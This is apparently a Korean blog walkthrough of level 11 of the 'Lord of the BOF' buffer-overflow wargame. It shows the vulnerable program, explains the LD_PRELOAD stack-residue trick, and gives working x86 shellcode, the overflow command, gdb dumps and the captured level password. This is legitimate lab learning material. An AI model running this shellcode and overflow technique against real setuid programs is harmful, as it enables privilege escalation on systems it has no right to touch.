-----------------------------------------------------------------------------------------------------------------------------
Sur3x5f Report - LOB Level11 [ Skeleton -> Golem ]
-----------------------------------------------------------------------------------------------------------------------------
드디어 골렘문제입니다. 부닺쳐봅시다!
[skeleton@localhost xodnr]$ cat golem.c
/*
The Lord of the BOF : The Fellowship of the BOF
- golem
- stack destroyer
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// stack destroyer!
memset(buffer, 0, 44);
memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48)); // 으어 이 망할놈
}
모든것을 초기화 시켜버립니다. 단 소스를 확인해보면 없어진게 하나 있습니다.
바로 환경변수를 초기화 하는 부분입니다. 그렇다고 에그쉘을 사용하고 그러는 문제는 아니고
밤새 고민하다가 해킹캠프때 새벽 5시 쯤 혁이에게 질문해 힌트를 얻어냈는데
바로 LD_PRELOAD와 LD_LIBRARY_PATH 환경변수의 도움을 받아내는것입니다. 이 환경변수들은 공유라이브러리를 지정할때
사용합니다. 고로 이 부분에 입력해주면 이 부분을 먼저 보고 이 부분에 없다면 PATH 환경변수를 참조해라~ 이런 역할을 합니다.
이 친구들은 마찬가지로 스택에 찌꺼기를 남겨 사용할 수 있는데 그 부분을 이용해 공격하면됩니다.
고로 공유라이브러리 파일을 생성할때 파일이름을 NOP 와 쉘코드로 지정해준다음 LD_PRELOAD 환경변수 등록하고
주소찾아서 리턴시켜주어 쉘이 뜨도록 하는겁니다.
추가 ---------------------------------- >
http://linux-virus.springnote.com/pages/1855278
http://codefactory.zc.bz/224
골렘은 스택의 모든 영역을 초기화 시킨다. 그래서 GDB 로 살펴보면 전 레벨에서 사용했던 Argv[0] 까지 이용할 수 없이
모두 골렘이 잡아먹어버리는데 LD_PRELOAD(, LD_LIBRARY_PATH) 라는 환경변수를 사용하면 된다.
LD_PRELOAD 환경변수를 이용해 긴값을 정의하면 스택의 약간의 찌꺼기가 생성된다. 실행을 하고 환경변수를 사용하는데
그 과정에서 찌꺼기가 남기때문에 초기화되지 않게된다.
고로 환경변수로 등록하지않는다면 일반적으로 정의되어있는 라이브러리를 참고하지만 LD_PRELOAD 환경변수를 이용해
자신만의 함수를 재정의하여 사용할수 있게되는것이다.
프로그램 실행 -> 일반 공유라이브러리 로드
LD_PRELOAD 정의 시 : 프로그램 실행 -> LD_PRELOAD 공유 라이브러리 로드
이렇게 되는것이다.
공유라이브러리 파일을 만들어 LD_PRELOAD 환경변수로 등록해주면 되는데 등록할때 파일명과 환경변수명을 NOP 와 쉘코드로
지정을 해주는방법을 사용해보자.
GCC 로 컴파일할때는 -fPIC -shared 명령어를 사용해야된다.
[gate@localhost gate]$ man gcc | grep fPIC
-fpcc-struct-return -fpic -fPIC -freg-struct-return
[gate@localhost gate]$ man gcc | grep shared
-llibrary -nostartfiles -nostdlib -static -shared
-mpa-risc-1-0 -mpa-risc-1-1 -mkernel -mshared-libs
-mno-shared-libs -mlong-calls -mdisable-fpregs
-fshared-data -fshort-enums -fshort-double
vents linking with the shared libraries. On other
Produce a shared object which can then be linked
shared object. Warn about any unresolved refer
shared libraries. This option is not fully func
shared libraries. This is the default for all PA
this compilation be shared data rather than private
operating systems, where shared data is shared be
shared library.
-fPIC 명령어는 공유 라이브러리 파일을 생성할때 사용하는 명령어이며
-fpic 는 CPU 에 따라 이상이 있지만 -fPIC 명령어는 CPU 에 관계없이 고속으로 컴파일한다.
-shared 명령어는 동적 라이브러리 파일을 생성하라는 명령어로 알고있다.
그래서 LD_PRELOAD 에 등록하기위한 라이브러리 파일을 만들때는
gcc -fPIC -shared -o `nop + shellcode` file.c
로 만들어 등록하고 export LD_PRELOAD=`nop + shellcode` 로 등록해주면 된다.
추가 ---------------------------------- >
[skeleton@localhost xodnr]$ ll
total 40
-rw------- 1 skeleton skeleton 12288 Aug 27 21:44 core
-rwxrwxr-x 1 skeleton skeleton 12199 Aug 27 18:02 gole
-rw-r--r-- 1 skeleton skeleton 539 Aug 27 18:02 gole
-rwxrwxr-x 1 skeleton skeleton 5548 Aug 27 21:50 ld
-rw-rw-r-- 1 skeleton skeleton 13 Aug 27 18:04 ld.c
[skeleton@localhost xodnr]$ gcc -fPIC -shared ld.c -o `python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
환경변수에 등록해줄때에는 경로를 정확히 지정해주어서 등록해주어야만 합니다. 안 그러면 다른 곳에서의 파일네임 에러가 있을수도 있습니다.
[skeleton@localhost xodnr]$ pwd
/home/skeleton/xodnr
[skeleton@localhost xodnr]$ export LD_PRELOAD=/home/skeleton/xodnr/`python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
이제 LD_PRELOAD 의 주소로 리턴값을 설정시킨 후 공격하면 됩니다.
그러면 한번 LD_PRELOAD 의 주소를 찾아봅시다. 먼저 디버깅을 실행해봅시다.
[skeleton@localhost xodnr]$ gdb -q golem
(gdb) b *main+167
Breakpoint 1 at 0x8048517
(gdb) r
Starting program: /home/skeleton/xodnr/golem
argv error
Program exited normally.
(gdb) r `python -c 'print "\xbf"*48'`
Starting program: /home/skeleton/xodnr/golem `python -c 'print "\xbf"*48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Breakpoint 1, 0x8048517 in main ()
(gdb) x/50x $esp
0xbffffa0c: 0xbfbfbfbf 0x00000000 0x00000000 0x00000000
0xbffffa1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffaac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffabc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffacc: 0x00000000 0x00000000
(gdb)
0xbffffad4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffae4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffaf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb94: 0x00000000 0x00000000
(gdb)
0xbffffb9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbbc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbcc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbdc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbfc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc0c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc5c: 0x00000000 0x00000000
(gdb)
0xbffffc64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffca4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffce4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd24: 0x00000000 0x00000000
(gdb)
0xbffffd2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdbc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdcc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffddc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdec: 0x00000000 0x00000000
(gdb)
0xbffffdf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffea4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeb4: 0x00000000 0x00000000
(gdb)
0xbffffebc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffecc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffedc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffefc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff0c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff7c: 0x00000000 0x00000000
(gdb)
0xbfffff84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffa4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffe4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffff4: 0x00000000 0x00000000 0x00000000 Cannot access memory at address 0xc0000000
후아......... 스택이 텅 비어있습니다. 혁주에게 힌트를 받은건데 저 멀리 뒷부분도 참조해보라는 힌트를 받았습니다.
그래서 넉넉하게 -3000 부터 스택을 보았더니
(gdb) x/50x $esp-3000
0xbfffee54: 0x00000000 0x0000038c 0x00000000 0x000000cb
0xbfffee64: 0x0000059b 0x00000707 0x00000557 0x00000000
0xbfffee74: 0x00000564 0x00000000 0x00000301 0x0000048e
0xbfffee84: 0x00000550 0x00000000 0x0000067f 0x00000000
0xbfffee94: 0x00000000 0x00000715 0x000005e9 0x0000060d
0xbfffeea4: 0x00000529 0x000003a4 0x00000351 0x000006cd
0xbfffeeb4: 0x000000b9 0x00000679 0x00000000 0x000005e1
0xbfffeec4: 0x00000141 0x00000503 0x00000072 0x0000062d
0xbfffeed4: 0x00000000 0x00000000 0x000005a3 0x0000021e
0xbfffeee4: 0x0000020d 0x00000608 0x00000000 0x00000000
0xbfffeef4: 0x00000706 0x000006f6 0x000006fc 0x0000041b
0xbfffef04: 0x00000701 0x0000062b 0x00000547 0x00000000
0xbfffef14: 0x00000000 0x00000000
(gdb)
0xbfffef1c: 0x0000052c 0x00000171 0x00000687 0x00000148
0xbfffef2c: 0x00000497 0x00000000 0x000002b9 0x00000629
0xbfffef3c: 0x000004f5 0x0000029b 0x00000725 0x00000639
0xbfffef4c: 0x000002ac 0x00000000 0x000006f1 0x00000000
0xbfffef5c: 0x000006a1 0x000004d4 0x000005c9 0x0000029f
0xbfffef6c: 0x000006a6 0x0000045f 0x000006dd 0x000004a6
0xbfffef7c: 0x00000000 0x00000620 0x0000051e 0x00000000
0xbfffef8c: 0x00000584 0x0000069c 0x00000716 0x0000054d
0xbfffef9c: 0x00000527 0x000004ed 0x000003a1 0x00000458
0xbfffefac: 0x00000466 0x0000063f 0x00000000 0x000001ca
0xbfffefbc: 0x00000000 0x0000027f 0x00000000 0x000006ba
0xbfffefcc: 0x0000055a 0x000002b6 0x000000d9 0x0000053d
0xbfffefdc: 0x00000252 0x000004bf
(gdb)
0xbfffefe4: 0x00000000 0x0000071a 0x00000673 0x000005fb
0xbfffeff4: 0x0000023f 0x00000653 0x00000000 0x00000189
0xbffff004: 0x000002a6 0x00000367 0x000003d7 0x00000340
0xbffff014: 0x000005fe 0x000006f3 0x0000056e 0x000004de
0xbffff024: 0x00000306 0x000006a5 0x00000145 0x000000f8
0xbffff034: 0x000000cc 0x000001c0 0x000005f1 0x00000457
0xbffff044: 0x00000712 0x00000703 0x00000226 0x00000513
0xbffff054: 0x4002bb0e 0xbffff128 0x400081e6 0x4002bad5
0xbffff064: 0x4002bad5 0x40013868 0x40014828 0x0000598c
0xbffff074: 0x00000432 0x0000013f 0x0000016e 0x000002f1
0xbffff084: 0x00000000 0x00000420 0x000006c0 0x0000052e
0xbffff094: 0x00005450 0x00000000 0x000004cd 0x00000000
0xbffff0a4: 0x00000000 0x400221c0
(gdb)
0xbffff0ac: 0x00000545 0x40023fd0 0x4001cd70 0x40014828
0xbffff0bc: 0x00000004 0x40014a98 0x00000002 0xbffff0e0
0xbffff0cc: 0x400221c0 0x40014a2c 0x03c40f19 0xbffff15c
0xbffff0dc: 0x4002995c 0x400221c0 0x40014828 0x4002bad5
0xbffff0ec: 0x4002bad5 0x40013868 0x40014828 0x0000590a
0xbffff0fc: 0x00000536 0x0000070b 0x00000167 0x00000555
0xbffff10c: 0x40001402 0xbffff1e0 0x40008134 0x40000c7d
0xbffff11c: 0x40024f23 0x40013868 0x40014828 0x00000f53
0xbffff12c: 0x4000a7fd 0x40014818 0x40014b50 0x00000007
0xbffff13c: 0x4000a74e 0x4010a1ec 0xbffff1e1 0x00000000
0xbffff14c: 0x00000180 0x400221c0 0x4010a710 0x00000000
0xbffff15c: 0x400221c0 0x40000474 0x00000000 0x40000824
0xbffff16c: 0x400002f4 0x40013c00
(gdb)
0xbffff174: 0x00000004 0x40014a98 0x00000004 0xbffff198
0xbffff184: 0x4001dd60 0x40014a34 0x056e90c5 0xbffff214
0xbffff194: 0x40024f23 0x4001dd60 0x40014828 0x000000bd
0xbffff1a4: 0x4002bb0e 0xbffff278 0x400081e6 0x4002bad5
0xbffff1b4: 0x4002bad5 0x40013868 0x40014828 0x0000187f
0xbffff1c4: 0x00000001 0x4001fe70 0x00000310 0x40023fd0
0xbffff1d4: 0x4001cd70 0x40014828 0x00000004 0xbffff218
0xbffff1e4: 0x4000a7fd 0x40014818 0x40014b50 0x40001402
0xbffff1f4: 0xbffff2c4 0x40008134 0x40000ec9 0x40025713
0xbffff204: 0x40013868 0x40014828 0x00001743 0x40024f23
0xbffff214: 0x4001dd60 0xbffff258 0x4000a970 0x40017000
0xbffff224: 0x40108980 0x400c0b00 0x00000000 0x40000ec9
0xbffff234: 0x400707e4 0x00000001
(gdb)
0xbffff23c: 0x00000000 0x00000031 0x40000664 0x00000000
0xbffff24c: 0x40000824 0x400002f4 0x40013c00 0x00000004
0xbffff25c: 0x40014a98 0x00000004 0xbffff27c 0x4001e4f0
0xbffff26c: 0x40014a34 0x00dc28f5 0xbffff2f8 0x40025713
0xbffff27c: 0x4001e4f0 0x40014828 0x40108980 0x40017000
0xbffff28c: 0x00000031 0x4010a1ec 0x40108980 0xbffff2b8
0xbffff29c: 0x4006fa3e 0x40108980 0x40017000 0x00000031
0xbffff2ac: 0x4010a1ec 0x00000001 0x40108980 0xbffff2cc
0xbffff2bc: 0x400711c7 0x40108980 0xbffff2fc 0x4000a7fd
0xbffff2cc: 0x40014818 0x40014b50 0x00000007 0x4000a74e
0xbffff2dc: 0x4010a1ec 0x0804859c 0x00000001 0x40014828
0xbffff2ec: 0x4001e4f0 0x4010a320 0x40025713 0x4001e4f0
0xbffff2fc: 0xbffff9b4 0x4000a970
(gdb)
0xbffff304: 0x40108980 0x00000400 0x4006c2e4 0x40014828
0xbffff314: 0xbffff9b4 0x4006428b 0x40108980 0x4010a1ec
0xbffff324: 0x4000ae60 0xbffffa54 0x00000000 0x00000000
0xbffff334: 0x00002fb2 0x00001000 0x00000018 0x4e5920c4
0xbffff344: 0x0000385c 0x40014828 0x00000018 0x000ed9c0
0xbffff354: 0x00000002 0xbfffe284 0xbfffe254 0xbfffe2cc
0xbffff364: 0x00001000 0xbfffe2cc 0x00000003 0x000f485c
0xbffff374: 0xbfffe3a0 0xbfffe300 0x40013ed0 0x00000808
0xbffff384: 0x00000000 0x00000000 0x0000675b 0x000081a4
0xbffff394: 0x0804859c 0x25000000 0x00000000 0x00000001
0xbffff3a4: 0x00000000 0x00000053 0x00008561 0x000081ed
0xbffff3b4: 0x00000001 0x00000000 0x40001402 0xbffff490
0xbffff3c4: 0x400081e6 0x400013e1
(gdb)
0xbffff3cc: 0x400013e1 0x40013868 0x400013a5 0x40000824
0xbffff3dc: 0x400013d3 0x40013c00 0x40014a88 0x0000000e
0xbffff3ec: 0x40013e80 0x400013d3 0x400014c4 0x00000000
0xbffff3fc: 0x00000520 0x4002bad5 0x400013e1 0x00000000
0xbffff40c: 0xbffff494 0x40000814 0x00000052 0x40000824
0xbffff41c: 0x400002f4 0x40013c00 0x00000004 0x40014a98
0xbffff42c: 0x00000003 0xbffff448 0x40000814 0x400140d4
0xbffff43c: 0x0b725f23 0xbffff524 0x400013a5 0x40000814
0xbffff44c: 0x40013c00 0x400002f4 0x40013c00 0x00000000
0xbffff45c: 0x00000000 0x00000004 0x40014a98 0x00000004
0xbffff46c: 0xbffff48c 0x40000674 0x400140d8 0x01ee5739
0xbffff47c: 0xbffff524 0x40000edc 0x20733868 0xffffffff
0xbffff48c: 0xffffffd0 0x00000000
(gdb)
0xbffff494: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff4a4: 0x00000000 0x00000000 0x00000000 0xbffff9e0
0xbffff4b4: 0x40009c50 0x00005207 0x4001a0dc 0x4001a0dc
0xbffff4c4: 0x00000000 0x00000000 0x00000001 0xbffff9d8
0xbffff4d4: 0xbffff9b3 0x0804859b 0x08048599 0x00000031
0xbffff4e4: 0xffffffff 0x40013c00 0x4001a0d4 0x40010c9e
0xbffff4f4: 0x40000814 0x400138d4 0x40001402 0x400002f4
0xbffff504: 0x080482d0 0x080482d0 0xbffff554 0x00000002
0xbffff514: 0x40023fd0 0x40013c00 0x4000ba15 0x40013868
0xbffff524: 0x40000814 0x400041b0 0x00000001 0xbffff53c
0xbffff534: 0x0804859c 0x000002c8 0x00000000 0x080482d0
0xbffff544: 0x00000000 0x00000000 0x00000000 0xbffff55c
0xbffff554: 0x400075bb 0x40017000
(gdb)
0xbffff55c: 0x00002fb2 0x40013868 0xbffff744 0x4000380e
0xbffff56c: 0x40014480 0x6d6f682f 0x6b732f65 0x74656c65
0xbffff57c: 0x782f6e6f 0x726e646f 0x9090902f 0x90909090
0xbffff58c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff59c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5ac: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5bc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5cc: 0x90909090 0x90909090 0x90909090 0x90909090 // 여기 NOP 코드가 들어가있습니다.
0xbffff5dc: 0x90909090 0x90909090 0x90909090 0x5e11eb90 // 이곳으로 리턴시켜보겠습니당!
0xbffff5ec: 0x32b1c931 0xff0e6c80 0x01e98001 0x05ebf675
0xbffff5fc: 0xffffeae8 0x51c132ff 0x74303069 0x63306969
0xbffff60c: 0xe48a6f6a 0xe28a5451 0xce0cb19a 0x40000081
0xbffff61c: 0x40013868 0x4000220c
(gdb)
0xbffff624: 0xbffffb46 0x00000000 0x00000000 0x00000000 // 아마 이 부분부터 스택인가 봅니다.
0xbffff634: 0x00000000 0x40014a00 0x00000000 0x00000000
0xbffff644: 0x00000000 0x00000000 0x00000006 0x00000000
0xbffff654: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff664: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff674: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff684: 0x00000001 0x00000000 0x00000001 0xbffff56c
0xbffff694: 0x00060000 0x00000000 0x00000000 0x00000000
0xbffff6a4: 0x00000001 0x00000000 0x00000 000 0x00000000
0xbffff6b4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6c4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6d4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6e4: 0x00000000 0x00000000
[skeleton@localhost xodnr]$ ./golem `python -c 'print "\xbf"*44 + "\xcc\xf5\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Ìõÿ¿
bash$ id
uid=510(skeleton) gid=510(skeleton) groups=510(skeleton)
bash$ exit
쉘이 떴군요...... 욕이 나오면서 기쁩니다 ㅋㅋㅋ
[skeleton@localhost xodnr]$ cd ..
[skeleton@localhost skeleton]$ ./golem `python -c 'print "\xbf"*44 + "\xa8\xf5\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¨õÿ¿
bash$ id
uid=510(skeleton) gid=510(skeleton) euid=511(golem) egid=511(golem) groups=510(skeleton)
bash$ my-pass
euid = 511
cup of coffee
패스워드가 정상적으로 출력되었습니당!
'스터디 > wargames' 카테고리의 다른 글
| 파이썬 문제풀이, The Python Challenge Level2 문제풀이 (0) | 2013.09.12 |
|---|---|
| 파이썬 문제풀이, The Python Challenge Level1 문제풀이 (0) | 2013.09.11 |
| [BOF-Wargames] LOB Load of BOF LEVEL10 (Vampire -> Skeleton) 문제풀이 (1) | 2011.09.04 |
| [BOF-Wargames] LOB Load of BOF LEVEL9 (troll -> vampire) 문제풀이 (0) | 2011.08.19 |
| [BOF-Wargames] LOB Load of BOF LEVEL8 (orge -> troll) 문제풀이 (0) | 2011.08.19 |
